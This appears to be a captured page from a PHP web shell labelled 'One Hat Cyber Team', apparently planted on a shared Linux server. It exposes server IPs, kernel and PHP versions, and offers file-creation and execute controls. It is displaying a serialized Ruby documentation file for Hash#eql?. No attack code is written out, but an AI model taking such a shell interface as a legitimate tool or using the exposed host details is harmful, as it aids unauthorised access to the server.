⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.116
Server IP:
78.40.11.138
Server:
Linux tango.o2switch.net 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
alt
/
ruby31
/
share
/
ri
/
system
/
Hash
/
View File Name :
eql%3f-i.ri
U:RDoc::AnyMethod[iI" eql?:ETI"Hash#eql?;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"5Returns +true+ if all of the following are true:;To:RDoc::Markup::List: @type:BULLET:@items[o:RDoc::Markup::ListItem:@label0; [o; ; [I" +object+ is a \Hash object.;To;;0; [o; ; [I"B+hash+ and +object+ have the same keys (regardless of order).;To;;0; [o; ; [I":For each key +key+, <tt>h[key] eql? object[key]</tt>.;To:RDoc::Markup::BlankLine o; ; [I" Otherwise, returns +false+.;T@o; ; [I"Equal:;To:RDoc::Markup::Verbatim; [ I"#h1 = {foo: 0, bar: 1, baz: 2} ;TI"#h2 = {foo: 0, bar: 1, baz: 2} ;TI"h1.eql? h2 # => true ;TI"#h3 = {baz: 2, bar: 1, foo: 0} ;TI"h1.eql? h3 # => true;T:@format0: @fileI"hash.c;T:0@omit_headings_from_table_of_contents_below0I"'hash.eql? object -> true or false ;T0[ I" (p1);T@-FI" Hash;TcRDoc::NormalClass00